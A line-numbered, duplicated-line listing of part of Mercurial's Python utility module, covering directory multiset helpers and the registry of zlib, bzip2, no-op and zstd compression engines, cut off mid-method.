3213 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3219 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3214 By default it will flush stdout first.
3220 By default it will flush stdout first.
3215 It can be used everywhere and intentionally does not require an ui object.
3221 It can be used everywhere and intentionally does not require an ui object.
3216 Not be used in production code but very convenient while developing.
3222 Not be used in production code but very convenient while developing.
3217 '''
3223 '''
3218 if otherf:
3224 if otherf:
3219 otherf.flush()
3225 otherf.flush()
3220 f.write('%s at:\n' % msg.rstrip())
3226 f.write('%s at:\n' % msg.rstrip())
3221 for line in getstackframes(skip + 1, depth=depth):
3227 for line in getstackframes(skip + 1, depth=depth):
3222 f.write(line)
3228 f.write(line)
3223 f.flush()
3229 f.flush()
3224
3230
3225 class dirs(object):
3231 class dirs(object):
3226 '''a multiset of directory names from a dirstate or manifest'''
3232 '''a multiset of directory names from a dirstate or manifest'''
3227
3233
3228 def __init__(self, map, skip=None):
3234 def __init__(self, map, skip=None):
3229 self._dirs = {}
3235 self._dirs = {}
3230 addpath = self.addpath
3236 addpath = self.addpath
3231 if safehasattr(map, 'iteritems') and skip is not None:
3237 if safehasattr(map, 'iteritems') and skip is not None:
3232 for f, s in map.iteritems():
3238 for f, s in map.iteritems():
3233 if s[0] != skip:
3239 if s[0] != skip:
3234 addpath(f)
3240 addpath(f)
3235 else:
3241 else:
3236 for f in map:
3242 for f in map:
3237 addpath(f)
3243 addpath(f)
3238
3244
3239 def addpath(self, path):
3245 def addpath(self, path):
3240 dirs = self._dirs
3246 dirs = self._dirs
3241 for base in finddirs(path):
3247 for base in finddirs(path):
3242 if base in dirs:
3248 if base in dirs:
3243 dirs[base] += 1
3249 dirs[base] += 1
3244 return
3250 return
3245 dirs[base] = 1
3251 dirs[base] = 1
3246
3252
3247 def delpath(self, path):
3253 def delpath(self, path):
3248 dirs = self._dirs
3254 dirs = self._dirs
3249 for base in finddirs(path):
3255 for base in finddirs(path):
3250 if dirs[base] > 1:
3256 if dirs[base] > 1:
3251 dirs[base] -= 1
3257 dirs[base] -= 1
3252 return
3258 return
3253 del dirs[base]
3259 del dirs[base]
3254
3260
3255 def __iter__(self):
3261 def __iter__(self):
3256 return iter(self._dirs)
3262 return iter(self._dirs)
3257
3263
3258 def __contains__(self, d):
3264 def __contains__(self, d):
3259 return d in self._dirs
3265 return d in self._dirs
3260
3266
3261 if safehasattr(parsers, 'dirs'):
3267 if safehasattr(parsers, 'dirs'):
3262 dirs = parsers.dirs
3268 dirs = parsers.dirs
3263
3269
3264 def finddirs(path):
3270 def finddirs(path):
3265 pos = path.rfind('/')
3271 pos = path.rfind('/')
3266 while pos != -1:
3272 while pos != -1:
3267 yield path[:pos]
3273 yield path[:pos]
3268 pos = path.rfind('/', 0, pos)
3274 pos = path.rfind('/', 0, pos)
3269
3275
3270 # compression code
3276 # compression code
3271
3277
3272 SERVERROLE = 'server'
3278 SERVERROLE = 'server'
3273 CLIENTROLE = 'client'
3279 CLIENTROLE = 'client'
3274
3280
3275 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3281 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3276 (u'name', u'serverpriority',
3282 (u'name', u'serverpriority',
3277 u'clientpriority'))
3283 u'clientpriority'))
3278
3284
3279 class compressormanager(object):
3285 class compressormanager(object):
3280 """Holds registrations of various compression engines.
3286 """Holds registrations of various compression engines.
3281
3287
3282 This class essentially abstracts the differences between compression
3288 This class essentially abstracts the differences between compression
3283 engines to allow new compression formats to be added easily, possibly from
3289 engines to allow new compression formats to be added easily, possibly from
3284 extensions.
3290 extensions.
3285
3291
3286 Compressors are registered against the global instance by calling its
3292 Compressors are registered against the global instance by calling its
3287 ``register()`` method.
3293 ``register()`` method.
3288 """
3294 """
3289 def __init__(self):
3295 def __init__(self):
3290 self._engines = {}
3296 self._engines = {}
3291 # Bundle spec human name to engine name.
3297 # Bundle spec human name to engine name.
3292 self._bundlenames = {}
3298 self._bundlenames = {}
3293 # Internal bundle identifier to engine name.
3299 # Internal bundle identifier to engine name.
3294 self._bundletypes = {}
3300 self._bundletypes = {}
3295 # Revlog header to engine name.
3301 # Revlog header to engine name.
3296 self._revlogheaders = {}
3302 self._revlogheaders = {}
3297 # Wire proto identifier to engine name.
3303 # Wire proto identifier to engine name.
3298 self._wiretypes = {}
3304 self._wiretypes = {}
3299
3305
3300 def __getitem__(self, key):
3306 def __getitem__(self, key):
3301 return self._engines[key]
3307 return self._engines[key]
3302
3308
3303 def __contains__(self, key):
3309 def __contains__(self, key):
3304 return key in self._engines
3310 return key in self._engines
3305
3311
3306 def __iter__(self):
3312 def __iter__(self):
3307 return iter(self._engines.keys())
3313 return iter(self._engines.keys())
3308
3314
3309 def register(self, engine):
3315 def register(self, engine):
3310 """Register a compression engine with the manager.
3316 """Register a compression engine with the manager.
3311
3317
3312 The argument must be a ``compressionengine`` instance.
3318 The argument must be a ``compressionengine`` instance.
3313 """
3319 """
3314 if not isinstance(engine, compressionengine):
3320 if not isinstance(engine, compressionengine):
3315 raise ValueError(_('argument must be a compressionengine'))
3321 raise ValueError(_('argument must be a compressionengine'))
3316
3322
3317 name = engine.name()
3323 name = engine.name()
3318
3324
3319 if name in self._engines:
3325 if name in self._engines:
3320 raise error.Abort(_('compression engine %s already registered') %
3326 raise error.Abort(_('compression engine %s already registered') %
3321 name)
3327 name)
3322
3328
3323 bundleinfo = engine.bundletype()
3329 bundleinfo = engine.bundletype()
3324 if bundleinfo:
3330 if bundleinfo:
3325 bundlename, bundletype = bundleinfo
3331 bundlename, bundletype = bundleinfo
3326
3332
3327 if bundlename in self._bundlenames:
3333 if bundlename in self._bundlenames:
3328 raise error.Abort(_('bundle name %s already registered') %
3334 raise error.Abort(_('bundle name %s already registered') %
3329 bundlename)
3335 bundlename)
3330 if bundletype in self._bundletypes:
3336 if bundletype in self._bundletypes:
3331 raise error.Abort(_('bundle type %s already registered by %s') %
3337 raise error.Abort(_('bundle type %s already registered by %s') %
3332 (bundletype, self._bundletypes[bundletype]))
3338 (bundletype, self._bundletypes[bundletype]))
3333
3339
3334 # No external facing name declared.
3340 # No external facing name declared.
3335 if bundlename:
3341 if bundlename:
3336 self._bundlenames[bundlename] = name
3342 self._bundlenames[bundlename] = name
3337
3343
3338 self._bundletypes[bundletype] = name
3344 self._bundletypes[bundletype] = name
3339
3345
3340 wiresupport = engine.wireprotosupport()
3346 wiresupport = engine.wireprotosupport()
3341 if wiresupport:
3347 if wiresupport:
3342 wiretype = wiresupport.name
3348 wiretype = wiresupport.name
3343 if wiretype in self._wiretypes:
3349 if wiretype in self._wiretypes:
3344 raise error.Abort(_('wire protocol compression %s already '
3350 raise error.Abort(_('wire protocol compression %s already '
3345 'registered by %s') %
3351 'registered by %s') %
3346 (wiretype, self._wiretypes[wiretype]))
3352 (wiretype, self._wiretypes[wiretype]))
3347
3353
3348 self._wiretypes[wiretype] = name
3354 self._wiretypes[wiretype] = name
3349
3355
3350 revlogheader = engine.revlogheader()
3356 revlogheader = engine.revlogheader()
3351 if revlogheader and revlogheader in self._revlogheaders:
3357 if revlogheader and revlogheader in self._revlogheaders:
3352 raise error.Abort(_('revlog header %s already registered by %s') %
3358 raise error.Abort(_('revlog header %s already registered by %s') %
3353 (revlogheader, self._revlogheaders[revlogheader]))
3359 (revlogheader, self._revlogheaders[revlogheader]))
3354
3360
3355 if revlogheader:
3361 if revlogheader:
3356 self._revlogheaders[revlogheader] = name
3362 self._revlogheaders[revlogheader] = name
3357
3363
3358 self._engines[name] = engine
3364 self._engines[name] = engine
3359
3365
3360 @property
3366 @property
3361 def supportedbundlenames(self):
3367 def supportedbundlenames(self):
3362 return set(self._bundlenames.keys())
3368 return set(self._bundlenames.keys())
3363
3369
3364 @property
3370 @property
3365 def supportedbundletypes(self):
3371 def supportedbundletypes(self):
3366 return set(self._bundletypes.keys())
3372 return set(self._bundletypes.keys())
3367
3373
3368 def forbundlename(self, bundlename):
3374 def forbundlename(self, bundlename):
3369 """Obtain a compression engine registered to a bundle name.
3375 """Obtain a compression engine registered to a bundle name.
3370
3376
3371 Will raise KeyError if the bundle type isn't registered.
3377 Will raise KeyError if the bundle type isn't registered.
3372
3378
3373 Will abort if the engine is known but not available.
3379 Will abort if the engine is known but not available.
3374 """
3380 """
3375 engine = self._engines[self._bundlenames[bundlename]]
3381 engine = self._engines[self._bundlenames[bundlename]]
3376 if not engine.available():
3382 if not engine.available():
3377 raise error.Abort(_('compression engine %s could not be loaded') %
3383 raise error.Abort(_('compression engine %s could not be loaded') %
3378 engine.name())
3384 engine.name())
3379 return engine
3385 return engine
3380
3386
3381 def forbundletype(self, bundletype):
3387 def forbundletype(self, bundletype):
3382 """Obtain a compression engine registered to a bundle type.
3388 """Obtain a compression engine registered to a bundle type.
3383
3389
3384 Will raise KeyError if the bundle type isn't registered.
3390 Will raise KeyError if the bundle type isn't registered.
3385
3391
3386 Will abort if the engine is known but not available.
3392 Will abort if the engine is known but not available.
3387 """
3393 """
3388 engine = self._engines[self._bundletypes[bundletype]]
3394 engine = self._engines[self._bundletypes[bundletype]]
3389 if not engine.available():
3395 if not engine.available():
3390 raise error.Abort(_('compression engine %s could not be loaded') %
3396 raise error.Abort(_('compression engine %s could not be loaded') %
3391 engine.name())
3397 engine.name())
3392 return engine
3398 return engine
3393
3399
3394 def supportedwireengines(self, role, onlyavailable=True):
3400 def supportedwireengines(self, role, onlyavailable=True):
3395 """Obtain compression engines that support the wire protocol.
3401 """Obtain compression engines that support the wire protocol.
3396
3402
3397 Returns a list of engines in prioritized order, most desired first.
3403 Returns a list of engines in prioritized order, most desired first.
3398
3404
3399 If ``onlyavailable`` is set, filter out engines that can't be
3405 If ``onlyavailable`` is set, filter out engines that can't be
3400 loaded.
3406 loaded.
3401 """
3407 """
3402 assert role in (SERVERROLE, CLIENTROLE)
3408 assert role in (SERVERROLE, CLIENTROLE)
3403
3409
3404 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3410 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3405
3411
3406 engines = [self._engines[e] for e in self._wiretypes.values()]
3412 engines = [self._engines[e] for e in self._wiretypes.values()]
3407 if onlyavailable:
3413 if onlyavailable:
3408 engines = [e for e in engines if e.available()]
3414 engines = [e for e in engines if e.available()]
3409
3415
3410 def getkey(e):
3416 def getkey(e):
3411 # Sort first by priority, highest first. In case of tie, sort
3417 # Sort first by priority, highest first. In case of tie, sort
3412 # alphabetically. This is arbitrary, but ensures output is
3418 # alphabetically. This is arbitrary, but ensures output is
3413 # stable.
3419 # stable.
3414 w = e.wireprotosupport()
3420 w = e.wireprotosupport()
3415 return -1 * getattr(w, attr), w.name
3421 return -1 * getattr(w, attr), w.name
3416
3422
3417 return list(sorted(engines, key=getkey))
3423 return list(sorted(engines, key=getkey))
3418
3424
3419 def forwiretype(self, wiretype):
3425 def forwiretype(self, wiretype):
3420 engine = self._engines[self._wiretypes[wiretype]]
3426 engine = self._engines[self._wiretypes[wiretype]]
3421 if not engine.available():
3427 if not engine.available():
3422 raise error.Abort(_('compression engine %s could not be loaded') %
3428 raise error.Abort(_('compression engine %s could not be loaded') %
3423 engine.name())
3429 engine.name())
3424 return engine
3430 return engine
3425
3431
3426 def forrevlogheader(self, header):
3432 def forrevlogheader(self, header):
3427 """Obtain a compression engine registered to a revlog header.
3433 """Obtain a compression engine registered to a revlog header.
3428
3434
3429 Will raise KeyError if the revlog header value isn't registered.
3435 Will raise KeyError if the revlog header value isn't registered.
3430 """
3436 """
3431 return self._engines[self._revlogheaders[header]]
3437 return self._engines[self._revlogheaders[header]]
3432
3438
3433 compengines = compressormanager()
3439 compengines = compressormanager()
3434
3440
3435 class compressionengine(object):
3441 class compressionengine(object):
3436 """Base class for compression engines.
3442 """Base class for compression engines.
3437
3443
3438 Compression engines must implement the interface defined by this class.
3444 Compression engines must implement the interface defined by this class.
3439 """
3445 """
3440 def name(self):
3446 def name(self):
3441 """Returns the name of the compression engine.
3447 """Returns the name of the compression engine.
3442
3448
3443 This is the key the engine is registered under.
3449 This is the key the engine is registered under.
3444
3450
3445 This method must be implemented.
3451 This method must be implemented.
3446 """
3452 """
3447 raise NotImplementedError()
3453 raise NotImplementedError()
3448
3454
3449 def available(self):
3455 def available(self):
3450 """Whether the compression engine is available.
3456 """Whether the compression engine is available.
3451
3457
3452 The intent of this method is to allow optional compression engines
3458 The intent of this method is to allow optional compression engines
3453 that may not be available in all installations (such as engines relying
3459 that may not be available in all installations (such as engines relying
3454 on C extensions that may not be present).
3460 on C extensions that may not be present).
3455 """
3461 """
3456 return True
3462 return True
3457
3463
3458 def bundletype(self):
3464 def bundletype(self):
3459 """Describes bundle identifiers for this engine.
3465 """Describes bundle identifiers for this engine.
3460
3466
3461 If this compression engine isn't supported for bundles, returns None.
3467 If this compression engine isn't supported for bundles, returns None.
3462
3468
3463 If this engine can be used for bundles, returns a 2-tuple of strings of
3469 If this engine can be used for bundles, returns a 2-tuple of strings of
3464 the user-facing "bundle spec" compression name and an internal
3470 the user-facing "bundle spec" compression name and an internal
3465 identifier used to denote the compression format within bundles. To
3471 identifier used to denote the compression format within bundles. To
3466 exclude the name from external usage, set the first element to ``None``.
3472 exclude the name from external usage, set the first element to ``None``.
3467
3473
3468 If bundle compression is supported, the class must also implement
3474 If bundle compression is supported, the class must also implement
3469 ``compressstream`` and `decompressorreader``.
3475 ``compressstream`` and `decompressorreader``.
3470
3476
3471 The docstring of this method is used in the help system to tell users
3477 The docstring of this method is used in the help system to tell users
3472 about this engine.
3478 about this engine.
3473 """
3479 """
3474 return None
3480 return None
3475
3481
3476 def wireprotosupport(self):
3482 def wireprotosupport(self):
3477 """Declare support for this compression format on the wire protocol.
3483 """Declare support for this compression format on the wire protocol.
3478
3484
3479 If this compression engine isn't supported for compressing wire
3485 If this compression engine isn't supported for compressing wire
3480 protocol payloads, returns None.
3486 protocol payloads, returns None.
3481
3487
3482 Otherwise, returns ``compenginewireprotosupport`` with the following
3488 Otherwise, returns ``compenginewireprotosupport`` with the following
3483 fields:
3489 fields:
3484
3490
3485 * String format identifier
3491 * String format identifier
3486 * Integer priority for the server
3492 * Integer priority for the server
3487 * Integer priority for the client
3493 * Integer priority for the client
3488
3494
3489 The integer priorities are used to order the advertisement of format
3495 The integer priorities are used to order the advertisement of format
3490 support by server and client. The highest integer is advertised
3496 support by server and client. The highest integer is advertised
3491 first. Integers with non-positive values aren't advertised.
3497 first. Integers with non-positive values aren't advertised.
3492
3498
3493 The priority values are somewhat arbitrary and only used for default
3499 The priority values are somewhat arbitrary and only used for default
3494 ordering. The relative order can be changed via config options.
3500 ordering. The relative order can be changed via config options.
3495
3501
3496 If wire protocol compression is supported, the class must also implement
3502 If wire protocol compression is supported, the class must also implement
3497 ``compressstream`` and ``decompressorreader``.
3503 ``compressstream`` and ``decompressorreader``.
3498 """
3504 """
3499 return None
3505 return None
3500
3506
3501 def revlogheader(self):
3507 def revlogheader(self):
3502 """Header added to revlog chunks that identifies this engine.
3508 """Header added to revlog chunks that identifies this engine.
3503
3509
3504 If this engine can be used to compress revlogs, this method should
3510 If this engine can be used to compress revlogs, this method should
3505 return the bytes used to identify chunks compressed with this engine.
3511 return the bytes used to identify chunks compressed with this engine.
3506 Else, the method should return ``None`` to indicate it does not
3512 Else, the method should return ``None`` to indicate it does not
3507 participate in revlog compression.
3513 participate in revlog compression.
3508 """
3514 """
3509 return None
3515 return None
3510
3516
3511 def compressstream(self, it, opts=None):
3517 def compressstream(self, it, opts=None):
3512 """Compress an iterator of chunks.
3518 """Compress an iterator of chunks.
3513
3519
3514 The method receives an iterator (ideally a generator) of chunks of
3520 The method receives an iterator (ideally a generator) of chunks of
3515 bytes to be compressed. It returns an iterator (ideally a generator)
3521 bytes to be compressed. It returns an iterator (ideally a generator)
3516 of bytes of chunks representing the compressed output.
3522 of bytes of chunks representing the compressed output.
3517
3523
3518 Optionally accepts an argument defining how to perform compression.
3524 Optionally accepts an argument defining how to perform compression.
3519 Each engine treats this argument differently.
3525 Each engine treats this argument differently.
3520 """
3526 """
3521 raise NotImplementedError()
3527 raise NotImplementedError()
3522
3528
3523 def decompressorreader(self, fh):
3529 def decompressorreader(self, fh):
3524 """Perform decompression on a file object.
3530 """Perform decompression on a file object.
3525
3531
3526 Argument is an object with a ``read(size)`` method that returns
3532 Argument is an object with a ``read(size)`` method that returns
3527 compressed data. Return value is an object with a ``read(size)`` that
3533 compressed data. Return value is an object with a ``read(size)`` that
3528 returns uncompressed data.
3534 returns uncompressed data.
3529 """
3535 """
3530 raise NotImplementedError()
3536 raise NotImplementedError()
3531
3537
3532 def revlogcompressor(self, opts=None):
3538 def revlogcompressor(self, opts=None):
3533 """Obtain an object that can be used to compress revlog entries.
3539 """Obtain an object that can be used to compress revlog entries.
3534
3540
3535 The object has a ``compress(data)`` method that compresses binary
3541 The object has a ``compress(data)`` method that compresses binary
3536 data. This method returns compressed binary data or ``None`` if
3542 data. This method returns compressed binary data or ``None`` if
3537 the data could not be compressed (too small, not compressible, etc).
3543 the data could not be compressed (too small, not compressible, etc).
3538 The returned data should have a header uniquely identifying this
3544 The returned data should have a header uniquely identifying this
3539 compression format so decompression can be routed to this engine.
3545 compression format so decompression can be routed to this engine.
3540 This header should be identified by the ``revlogheader()`` return
3546 This header should be identified by the ``revlogheader()`` return
3541 value.
3547 value.
3542
3548
3543 The object has a ``decompress(data)`` method that decompresses
3549 The object has a ``decompress(data)`` method that decompresses
3544 data. The method will only be called if ``data`` begins with
3550 data. The method will only be called if ``data`` begins with
3545 ``revlogheader()``. The method should return the raw, uncompressed
3551 ``revlogheader()``. The method should return the raw, uncompressed
3546 data or raise a ``RevlogError``.
3552 data or raise a ``RevlogError``.
3547
3553
3548 The object is reusable but is not thread safe.
3554 The object is reusable but is not thread safe.
3549 """
3555 """
3550 raise NotImplementedError()
3556 raise NotImplementedError()
3551
3557
3552 class _zlibengine(compressionengine):
3558 class _zlibengine(compressionengine):
3553 def name(self):
3559 def name(self):
3554 return 'zlib'
3560 return 'zlib'
3555
3561
3556 def bundletype(self):
3562 def bundletype(self):
3557 """zlib compression using the DEFLATE algorithm.
3563 """zlib compression using the DEFLATE algorithm.
3558
3564
3559 All Mercurial clients should support this format. The compression
3565 All Mercurial clients should support this format. The compression
3560 algorithm strikes a reasonable balance between compression ratio
3566 algorithm strikes a reasonable balance between compression ratio
3561 and size.
3567 and size.
3562 """
3568 """
3563 return 'gzip', 'GZ'
3569 return 'gzip', 'GZ'
3564
3570
3565 def wireprotosupport(self):
3571 def wireprotosupport(self):
3566 return compewireprotosupport('zlib', 20, 20)
3572 return compewireprotosupport('zlib', 20, 20)
3567
3573
3568 def revlogheader(self):
3574 def revlogheader(self):
3569 return 'x'
3575 return 'x'
3570
3576
3571 def compressstream(self, it, opts=None):
3577 def compressstream(self, it, opts=None):
3572 opts = opts or {}
3578 opts = opts or {}
3573
3579
3574 z = zlib.compressobj(opts.get('level', -1))
3580 z = zlib.compressobj(opts.get('level', -1))
3575 for chunk in it:
3581 for chunk in it:
3576 data = z.compress(chunk)
3582 data = z.compress(chunk)
3577 # Not all calls to compress emit data. It is cheaper to inspect
3583 # Not all calls to compress emit data. It is cheaper to inspect
3578 # here than to feed empty chunks through generator.
3584 # here than to feed empty chunks through generator.
3579 if data:
3585 if data:
3580 yield data
3586 yield data
3581
3587
3582 yield z.flush()
3588 yield z.flush()
3583
3589
3584 def decompressorreader(self, fh):
3590 def decompressorreader(self, fh):
3585 def gen():
3591 def gen():
3586 d = zlib.decompressobj()
3592 d = zlib.decompressobj()
3587 for chunk in filechunkiter(fh):
3593 for chunk in filechunkiter(fh):
3588 while chunk:
3594 while chunk:
3589 # Limit output size to limit memory.
3595 # Limit output size to limit memory.
3590 yield d.decompress(chunk, 2 ** 18)
3596 yield d.decompress(chunk, 2 ** 18)
3591 chunk = d.unconsumed_tail
3597 chunk = d.unconsumed_tail
3592
3598
3593 return chunkbuffer(gen())
3599 return chunkbuffer(gen())
3594
3600
3595 class zlibrevlogcompressor(object):
3601 class zlibrevlogcompressor(object):
3596 def compress(self, data):
3602 def compress(self, data):
3597 insize = len(data)
3603 insize = len(data)
3598 # Caller handles empty input case.
3604 # Caller handles empty input case.
3599 assert insize > 0
3605 assert insize > 0
3600
3606
3601 if insize < 44:
3607 if insize < 44:
3602 return None
3608 return None
3603
3609
3604 elif insize <= 1000000:
3610 elif insize <= 1000000:
3605 compressed = zlib.compress(data)
3611 compressed = zlib.compress(data)
3606 if len(compressed) < insize:
3612 if len(compressed) < insize:
3607 return compressed
3613 return compressed
3608 return None
3614 return None
3609
3615
3610 # zlib makes an internal copy of the input buffer, doubling
3616 # zlib makes an internal copy of the input buffer, doubling
3611 # memory usage for large inputs. So do streaming compression
3617 # memory usage for large inputs. So do streaming compression
3612 # on large inputs.
3618 # on large inputs.
3613 else:
3619 else:
3614 z = zlib.compressobj()
3620 z = zlib.compressobj()
3615 parts = []
3621 parts = []
3616 pos = 0
3622 pos = 0
3617 while pos < insize:
3623 while pos < insize:
3618 pos2 = pos + 2**20
3624 pos2 = pos + 2**20
3619 parts.append(z.compress(data[pos:pos2]))
3625 parts.append(z.compress(data[pos:pos2]))
3620 pos = pos2
3626 pos = pos2
3621 parts.append(z.flush())
3627 parts.append(z.flush())
3622
3628
3623 if sum(map(len, parts)) < insize:
3629 if sum(map(len, parts)) < insize:
3624 return ''.join(parts)
3630 return ''.join(parts)
3625 return None
3631 return None
3626
3632
3627 def decompress(self, data):
3633 def decompress(self, data):
3628 try:
3634 try:
3629 return zlib.decompress(data)
3635 return zlib.decompress(data)
3630 except zlib.error as e:
3636 except zlib.error as e:
3631 raise error.RevlogError(_('revlog decompress error: %s') %
3637 raise error.RevlogError(_('revlog decompress error: %s') %
3632 forcebytestr(e))
3638 forcebytestr(e))
3633
3639
3634 def revlogcompressor(self, opts=None):
3640 def revlogcompressor(self, opts=None):
3635 return self.zlibrevlogcompressor()
3641 return self.zlibrevlogcompressor()
3636
3642
3637 compengines.register(_zlibengine())
3643 compengines.register(_zlibengine())
3638
3644
3639 class _bz2engine(compressionengine):
3645 class _bz2engine(compressionengine):
3640 def name(self):
3646 def name(self):
3641 return 'bz2'
3647 return 'bz2'
3642
3648
3643 def bundletype(self):
3649 def bundletype(self):
3644 """An algorithm that produces smaller bundles than ``gzip``.
3650 """An algorithm that produces smaller bundles than ``gzip``.
3645
3651
3646 All Mercurial clients should support this format.
3652 All Mercurial clients should support this format.
3647
3653
3648 This engine will likely produce smaller bundles than ``gzip`` but
3654 This engine will likely produce smaller bundles than ``gzip`` but
3649 will be significantly slower, both during compression and
3655 will be significantly slower, both during compression and
3650 decompression.
3656 decompression.
3651
3657
3652 If available, the ``zstd`` engine can yield similar or better
3658 If available, the ``zstd`` engine can yield similar or better
3653 compression at much higher speeds.
3659 compression at much higher speeds.
3654 """
3660 """
3655 return 'bzip2', 'BZ'
3661 return 'bzip2', 'BZ'
3656
3662
3657 # We declare a protocol name but don't advertise by default because
3663 # We declare a protocol name but don't advertise by default because
3658 # it is slow.
3664 # it is slow.
3659 def wireprotosupport(self):
3665 def wireprotosupport(self):
3660 return compewireprotosupport('bzip2', 0, 0)
3666 return compewireprotosupport('bzip2', 0, 0)
3661
3667
3662 def compressstream(self, it, opts=None):
3668 def compressstream(self, it, opts=None):
3663 opts = opts or {}
3669 opts = opts or {}
3664 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 z = bz2.BZ2Compressor(opts.get('level', 9))
3665 for chunk in it:
3671 for chunk in it:
3666 data = z.compress(chunk)
3672 data = z.compress(chunk)
3667 if data:
3673 if data:
3668 yield data
3674 yield data
3669
3675
3670 yield z.flush()
3676 yield z.flush()
3671
3677
3672 def decompressorreader(self, fh):
3678 def decompressorreader(self, fh):
3673 def gen():
3679 def gen():
3674 d = bz2.BZ2Decompressor()
3680 d = bz2.BZ2Decompressor()
3675 for chunk in filechunkiter(fh):
3681 for chunk in filechunkiter(fh):
3676 yield d.decompress(chunk)
3682 yield d.decompress(chunk)
3677
3683
3678 return chunkbuffer(gen())
3684 return chunkbuffer(gen())
3679
3685
3680 compengines.register(_bz2engine())
3686 compengines.register(_bz2engine())
3681
3687
3682 class _truncatedbz2engine(compressionengine):
3688 class _truncatedbz2engine(compressionengine):
3683 def name(self):
3689 def name(self):
3684 return 'bz2truncated'
3690 return 'bz2truncated'
3685
3691
3686 def bundletype(self):
3692 def bundletype(self):
3687 return None, '_truncatedBZ'
3693 return None, '_truncatedBZ'
3688
3694
3689 # We don't implement compressstream because it is hackily handled elsewhere.
3695 # We don't implement compressstream because it is hackily handled elsewhere.
3690
3696
3691 def decompressorreader(self, fh):
3697 def decompressorreader(self, fh):
3692 def gen():
3698 def gen():
3693 # The input stream doesn't have the 'BZ' header. So add it back.
3699 # The input stream doesn't have the 'BZ' header. So add it back.
3694 d = bz2.BZ2Decompressor()
3700 d = bz2.BZ2Decompressor()
3695 d.decompress('BZ')
3701 d.decompress('BZ')
3696 for chunk in filechunkiter(fh):
3702 for chunk in filechunkiter(fh):
3697 yield d.decompress(chunk)
3703 yield d.decompress(chunk)
3698
3704
3699 return chunkbuffer(gen())
3705 return chunkbuffer(gen())
3700
3706
3701 compengines.register(_truncatedbz2engine())
3707 compengines.register(_truncatedbz2engine())
3702
3708
3703 class _noopengine(compressionengine):
3709 class _noopengine(compressionengine):
3704 def name(self):
3710 def name(self):
3705 return 'none'
3711 return 'none'
3706
3712
3707 def bundletype(self):
3713 def bundletype(self):
3708 """No compression is performed.
3714 """No compression is performed.
3709
3715
3710 Use this compression engine to explicitly disable compression.
3716 Use this compression engine to explicitly disable compression.
3711 """
3717 """
3712 return 'none', 'UN'
3718 return 'none', 'UN'
3713
3719
3714 # Clients always support uncompressed payloads. Servers don't because
3720 # Clients always support uncompressed payloads. Servers don't because
3715 # unless you are on a fast network, uncompressed payloads can easily
3721 # unless you are on a fast network, uncompressed payloads can easily
3716 # saturate your network pipe.
3722 # saturate your network pipe.
3717 def wireprotosupport(self):
3723 def wireprotosupport(self):
3718 return compewireprotosupport('none', 0, 10)
3724 return compewireprotosupport('none', 0, 10)
3719
3725
3720 # We don't implement revlogheader because it is handled specially
3726 # We don't implement revlogheader because it is handled specially
3721 # in the revlog class.
3727 # in the revlog class.
3722
3728
3723 def compressstream(self, it, opts=None):
3729 def compressstream(self, it, opts=None):
3724 return it
3730 return it
3725
3731
3726 def decompressorreader(self, fh):
3732 def decompressorreader(self, fh):
3727 return fh
3733 return fh
3728
3734
3729 class nooprevlogcompressor(object):
3735 class nooprevlogcompressor(object):
3730 def compress(self, data):
3736 def compress(self, data):
3731 return None
3737 return None
3732
3738
3733 def revlogcompressor(self, opts=None):
3739 def revlogcompressor(self, opts=None):
3734 return self.nooprevlogcompressor()
3740 return self.nooprevlogcompressor()
3735
3741
3736 compengines.register(_noopengine())
3742 compengines.register(_noopengine())
3737
3743
3738 class _zstdengine(compressionengine):
3744 class _zstdengine(compressionengine):
3739 def name(self):
3745 def name(self):
3740 return 'zstd'
3746 return 'zstd'
3741
3747
3742 @propertycache
3748 @propertycache
3743 def _module(self):
3749 def _module(self):
3744 # Not all installs have the zstd module available. So defer importing
3750 # Not all installs have the zstd module available. So defer importing
3745 # until first access.
3751 # until first access.
3746 try:
3752 try:
3747 from . import zstd
3753 from . import zstd
3748 # Force delayed import.
3754 # Force delayed import.
3749 zstd.__version__
3755 zstd.__version__
3750 return zstd
3756 return zstd
3751 except ImportError:
3757 except ImportError:
3752 return None
3758 return None
3753
3759
3754 def available(self):
3760 def available(self):
3755 return bool(self._module)
3761 return bool(self._module)
3756
3762
3757 def bundletype(self):
3763 def bundletype(self):
3758 """A modern compression algorithm that is fast and highly flexible.
3764 """A modern compression algorithm that is fast and highly flexible.
3759
3765
3760 Only supported by Mercurial 4.1 and newer clients.
3766 Only supported by Mercurial 4.1 and newer clients.
3761
3767
3762 With the default settings, zstd compression is both faster and yields
3768 With the default settings, zstd compression is both faster and yields
3763 better compression than ``gzip``. It also frequently yields better
3769 better compression than ``gzip``. It also frequently yields better
3764 compression than ``bzip2`` while operating at much higher speeds.
3770 compression than ``bzip2`` while operating at much higher speeds.
3765
3771
3766 If this engine is available and backwards compatibility is not a
3772 If this engine is available and backwards compatibility is not a
3767 concern, it is likely the best available engine.
3773 concern, it is likely the best available engine.
3768 """
3774 """
3769 return 'zstd', 'ZS'
3775 return 'zstd', 'ZS'
3770
3776
3771 def wireprotosupport(self):
3777 def wireprotosupport(self):
3772 return compewireprotosupport('zstd', 50, 50)
3778 return compewireprotosupport('zstd', 50, 50)
3773
3779
3774 def revlogheader(self):
3780 def revlogheader(self):
3775 return '\x28'
3781 return '\x28'
3776
3782
3777 def compressstream(self, it, opts=None):
3783 def compressstream(self, it, opts=None):
3778 opts = opts or {}
3784 opts = opts or {}
3779 # zstd level 3 is almost always significantly faster than zlib
3785 # zstd level 3 is almost always significantly faster than zlib
3780 # while providing no worse compression. It strikes a good balance
3786 # while providing no worse compression. It strikes a good balance
3781 # between speed and compression.
3787 # between speed and compression.
3782 level = opts.get('level', 3)
3788 level = opts.get('level', 3)
3783
3789
3784 zstd = self._module
3790 zstd = self._module
3785 z = zstd.ZstdCompressor(level=level).compressobj()
3791 z = zstd.ZstdCompressor(level=level).compressobj()
3786 for chunk in it:
3792 for chunk in it:
3787 data = z.compress(chunk)
3793 data = z.compress(chunk)
3788 if data:
3794 if data:
3789 yield data
3795 yield data
3790
3796
3791 yield z.flush()
3797 yield z.flush()
3792
3798
3793 def decompressorreader(self, fh):
3799 def decompressorreader(self, fh):
3794 zstd = self._module
3800 zstd = self._module
3795 dctx = zstd.ZstdDecompressor()
